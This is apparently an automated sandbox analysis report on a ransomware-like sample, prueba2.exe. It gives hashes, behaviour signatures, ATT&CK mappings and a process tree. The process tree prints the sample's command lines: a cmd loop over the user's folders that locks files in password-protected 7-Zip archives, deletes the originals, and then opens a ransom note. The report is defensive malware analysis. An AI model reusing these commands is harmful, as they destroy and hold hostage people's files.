be3d67f3432d29b8339b324a0ee3150039da4cd7e95a3dcb564cca70f572603f

Analysis

max time kernel
146s
max time network
113s
platform
windows10_x64
resource
win10v200410
submitted
28/04/2020, 01:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

prueba2.exe
Size

329KB
MD5

9f5f9c71bb71b8e1571fc4d27721a99e
SHA1

e64de07b46d896d25dc059dd774a140f109364c3
SHA256

be3d67f3432d29b8339b324a0ee3150039da4cd7e95a3dcb564cca70f572603f
SHA512

6c5f031ef96f6fb930bb57c0cc1287f2f34d21475f2710f88341f955405e9cc37143a037939d5cd8387fe80f63ef9ad3ca7b70575d75dcfbca475bda9d941c16

Score

3^/10

Malware Config

Signatures

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3728	Winword.exe
3728	Winword.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Winword.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Winword.exe

Makes http(s) request 4 IoCs

Contacts server via http/https, possibly for C2 communication.

description	flow	ioc
HTTP URL	10	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?9bc81c9a58595765
HTTP URL	12	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D
HTTP URL	24	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?aa85e948382930ed
HTTP URL	17	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAtqs7A%2Bsan2xGCSaqjN%2FrM%3D

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3916	NOTEPAD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 4016 wrote to memory of 4088	4016	prueba2.exe	69
PID 4016 wrote to memory of 4088	4016	prueba2.exe	69
PID 4016 wrote to memory of 2280	4016	prueba2.exe	83
PID 4016 wrote to memory of 2280	4016	prueba2.exe	83
PID 4016 wrote to memory of 3788	4016	prueba2.exe	86
PID 4016 wrote to memory of 3788	4016	prueba2.exe	86
PID 4016 wrote to memory of 3308	4016	prueba2.exe	94
PID 4016 wrote to memory of 3308	4016	prueba2.exe	94
PID 4016 wrote to memory of 3184	4016	prueba2.exe	99
PID 4016 wrote to memory of 3184	4016	prueba2.exe	99
PID 4016 wrote to memory of 3232	4016	prueba2.exe	100
PID 4016 wrote to memory of 3232	4016	prueba2.exe	100
PID 4016 wrote to memory of 3964	4016	prueba2.exe	104
PID 4016 wrote to memory of 3964	4016	prueba2.exe	104
PID 3364 wrote to memory of 3728	3364	OpenWith.exe	110
PID 3364 wrote to memory of 3728	3364	OpenWith.exe	110

Suspicious use of SetWindowsHookEx 35 IoCs

pid	Process
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3364	OpenWith.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000_Classes\Local Settings	OpenWith.exe

Suspicious use of AdjustPrivilegeToken 116 IoCs

description	pid	Process
Token: SeRestorePrivilege	4044	7z.exe
Token: 35	4044	7z.exe
Token: SeSecurityPrivilege	4044	7z.exe
Token: SeSecurityPrivilege	4044	7z.exe
Token: SeRestorePrivilege	2624	7z.exe
Token: 35	2624	7z.exe
Token: SeSecurityPrivilege	2624	7z.exe
Token: SeSecurityPrivilege	2624	7z.exe
Token: SeRestorePrivilege	4092	7z.exe
Token: 35	4092	7z.exe
Token: SeSecurityPrivilege	4092	7z.exe
Token: SeSecurityPrivilege	4092	7z.exe
Token: SeRestorePrivilege	3688	7z.exe
Token: 35	3688	7z.exe
Token: SeSecurityPrivilege	3688	7z.exe
Token: SeSecurityPrivilege	3688	7z.exe
Token: SeRestorePrivilege	3764	7z.exe
Token: 35	3764	7z.exe
Token: SeSecurityPrivilege	3764	7z.exe
Token: SeSecurityPrivilege	3764	7z.exe
Token: SeRestorePrivilege	3184	7z.exe
Token: 35	3184	7z.exe
Token: SeSecurityPrivilege	3184	7z.exe
Token: SeSecurityPrivilege	3184	7z.exe
Token: SeRestorePrivilege	3204	7z.exe
Token: 35	3204	7z.exe
Token: SeSecurityPrivilege	3204	7z.exe
Token: SeSecurityPrivilege	3204	7z.exe
Token: SeRestorePrivilege	3428	7z.exe
Token: 35	3428	7z.exe
Token: SeSecurityPrivilege	3428	7z.exe
Token: SeSecurityPrivilege	3428	7z.exe
Token: SeRestorePrivilege	3728	7z.exe
Token: 35	3728	7z.exe
Token: SeSecurityPrivilege	3728	7z.exe
Token: SeSecurityPrivilege	3728	7z.exe
Token: SeRestorePrivilege	2592	7z.exe
Token: 35	2592	7z.exe
Token: SeSecurityPrivilege	2592	7z.exe
Token: SeSecurityPrivilege	2592	7z.exe
Token: SeRestorePrivilege	3844	7z.exe
Token: 35	3844	7z.exe
Token: SeSecurityPrivilege	3844	7z.exe
Token: SeSecurityPrivilege	3844	7z.exe
Token: SeRestorePrivilege	1656	7z.exe
Token: 35	1656	7z.exe
Token: SeSecurityPrivilege	1656	7z.exe
Token: SeSecurityPrivilege	1656	7z.exe
Token: SeRestorePrivilege	3916	7z.exe
Token: 35	3916	7z.exe
Token: SeSecurityPrivilege	3916	7z.exe
Token: SeSecurityPrivilege	3916	7z.exe
Token: SeRestorePrivilege	4028	7z.exe
Token: 35	4028	7z.exe
Token: SeSecurityPrivilege	4028	7z.exe
Token: SeSecurityPrivilege	4028	7z.exe
Token: SeRestorePrivilege	3900	7z.exe
Token: 35	3900	7z.exe
Token: SeSecurityPrivilege	3900	7z.exe
Token: SeSecurityPrivilege	3900	7z.exe
Token: SeRestorePrivilege	3780	7z.exe
Token: 35	3780	7z.exe
Token: SeSecurityPrivilege	3780	7z.exe
Token: SeSecurityPrivilege	3780	7z.exe
Token: SeRestorePrivilege	3752	7z.exe
Token: 35	3752	7z.exe
Token: SeSecurityPrivilege	3752	7z.exe
Token: SeSecurityPrivilege	3752	7z.exe
Token: SeRestorePrivilege	4044	7z.exe
Token: 35	4044	7z.exe
Token: SeSecurityPrivilege	4044	7z.exe
Token: SeSecurityPrivilege	4044	7z.exe
Token: SeRestorePrivilege	2624	7z.exe
Token: 35	2624	7z.exe
Token: SeSecurityPrivilege	2624	7z.exe
Token: SeSecurityPrivilege	2624	7z.exe
Token: SeRestorePrivilege	4092	7z.exe
Token: 35	4092	7z.exe
Token: SeSecurityPrivilege	4092	7z.exe
Token: SeSecurityPrivilege	4092	7z.exe
Token: SeRestorePrivilege	3688	7z.exe
Token: 35	3688	7z.exe
Token: SeSecurityPrivilege	3688	7z.exe
Token: SeSecurityPrivilege	3688	7z.exe
Token: SeRestorePrivilege	3408	7z.exe
Token: 35	3408	7z.exe
Token: SeSecurityPrivilege	3408	7z.exe
Token: SeSecurityPrivilege	3408	7z.exe
Token: SeRestorePrivilege	3200	7z.exe
Token: 35	3200	7z.exe
Token: SeSecurityPrivilege	3200	7z.exe
Token: SeSecurityPrivilege	3200	7z.exe
Token: SeRestorePrivilege	3364	7z.exe
Token: 35	3364	7z.exe
Token: SeSecurityPrivilege	3364	7z.exe
Token: SeSecurityPrivilege	3364	7z.exe
Token: SeRestorePrivilege	3324	7z.exe
Token: 35	3324	7z.exe
Token: SeSecurityPrivilege	3324	7z.exe
Token: SeSecurityPrivilege	3324	7z.exe
Token: SeRestorePrivilege	3400	7z.exe
Token: 35	3400	7z.exe
Token: SeSecurityPrivilege	3400	7z.exe
Token: SeSecurityPrivilege	3400	7z.exe
Token: SeRestorePrivilege	3168	7z.exe
Token: 35	3168	7z.exe
Token: SeSecurityPrivilege	3168	7z.exe
Token: SeSecurityPrivilege	3168	7z.exe
Token: SeRestorePrivilege	2644	7z.exe
Token: 35	2644	7z.exe
Token: SeSecurityPrivilege	2644	7z.exe
Token: SeSecurityPrivilege	2644	7z.exe
Token: SeRestorePrivilege	3956	7z.exe
Token: 35	3956	7z.exe
Token: SeSecurityPrivilege	3956	7z.exe
Token: SeSecurityPrivilege	3956	7z.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3916	NOTEPAD.EXE

C:\Users\Admin\AppData\Local\Temp\prueba2.exe
"C:\Users\Admin\AppData\Local\Temp\prueba2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
  2⤵
  PID:4088
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\Are.docx.geminis3" "C:\Users\Admin\Documents\Are.docx"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4044
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\BlockPop.docm.geminis3" "C:\Users\Admin\Documents\BlockPop.docm"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2624
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\Files.docx.geminis3" "C:\Users\Admin\Documents\Files.docx"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4092
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\Opened.docx.geminis3" "C:\Users\Admin\Documents\Opened.docx"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3688
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\OpenStart.doc.geminis3" "C:\Users\Admin\Documents\OpenStart.doc"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3764
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\Recently.docx.geminis3" "C:\Users\Admin\Documents\Recently.docx"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3184
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\These.docx.geminis3" "C:\Users\Admin\Documents\These.docx"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3204
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\DebugNew.xlsm.geminis3" "C:\Users\Admin\Documents\DebugNew.xlsm"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3428
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\RemoveInitialize.xlsm.geminis3" "C:\Users\Admin\Documents\RemoveInitialize.xlsm"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3728
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\ResolveSplit.xls.geminis3" "C:\Users\Admin\Documents\ResolveSplit.xls"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2592
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\SearchResize.xlsb.geminis3" "C:\Users\Admin\Documents\SearchResize.xlsb"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3844
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\UpdateSearch.xlsb.geminis3" "C:\Users\Admin\Documents\UpdateSearch.xlsb"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1656
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\OutProtect.ppt.geminis3" "C:\Users\Admin\Documents\OutProtect.ppt"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Pictures %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
  2⤵
  PID:2280
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Pictures\JoinStop.jpg.geminis3" "C:\Users\Admin\Pictures\JoinStop.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4028
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Pictures\Wallpaper.jpg.geminis3" "C:\Users\Admin\Pictures\Wallpaper.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Downloads %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
  2⤵
  PID:3788
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\UnlockClose.jpeg.geminis3" "C:\Users\Admin\Downloads\UnlockClose.jpeg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3780
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\UnblockSelect.doc.geminis3" "C:\Users\Admin\Downloads\UnblockSelect.doc"
    3⤵
    PID:3752
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\ApproveConfirm.xlsm.geminis3" "C:\Users\Admin\Downloads\ApproveConfirm.xlsm"
    3⤵
    PID:4044
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\ResizeConvertTo.xls.geminis3" "C:\Users\Admin\Downloads\ResizeConvertTo.xls"
    3⤵
    PID:2624
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\InitializeSelect.pptx.geminis3" "C:\Users\Admin\Downloads\InitializeSelect.pptx"
    3⤵
    PID:4092
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\ResolveReset.png.geminis3" "C:\Users\Admin\Downloads\ResolveReset.png"
    3⤵
    PID:3688
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\ExportExpand.mp4.geminis3" "C:\Users\Admin\Downloads\ExportExpand.mp4"
    3⤵
    PID:3408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Music %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
  2⤵
  PID:3308
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Music\ConfirmRequest.png.geminis3" "C:\Users\Admin\Music\ConfirmRequest.png"
    3⤵
    PID:3200
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Music\ConvertToWatch.png.geminis3" "C:\Users\Admin\Music\ConvertToWatch.png"
    3⤵
    PID:3364
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Music\SkipDisable.png.geminis3" "C:\Users\Admin\Music\SkipDisable.png"
    3⤵
    PID:3324
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Music\RemoveStep.rar.geminis3" "C:\Users\Admin\Music\RemoveStep.rar"
    3⤵
    PID:3400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Videos %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
  2⤵
  PID:3184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Desktop %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
  2⤵
  PID:3232
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Desktop\ReceiveConnect.docx.geminis3" "C:\Users\Admin\Desktop\ReceiveConnect.docx"
    3⤵
    PID:3168
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Desktop\GetConvertFrom.png.geminis3" "C:\Users\Admin\Desktop\GetConvertFrom.png"
    3⤵
    PID:2644
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Desktop\InstallSync.txt.geminis3" "C:\Users\Admin\Desktop\InstallSync.txt"
    3⤵
    PID:3956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start README.txt
  2⤵
  - Modifies registry class
  PID:3964
- - C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\README.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    - Suspicious use of FindShellTrayWindow
    PID:3916

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3776

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: GetForegroundWindowSpam
- Modifies registry class
PID:3364
- C:\Program Files\Microsoft Office\root\Office16\Winword.exe
  "C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\Documents\BlockPop.docm.geminis3"
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
  PID:3728

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads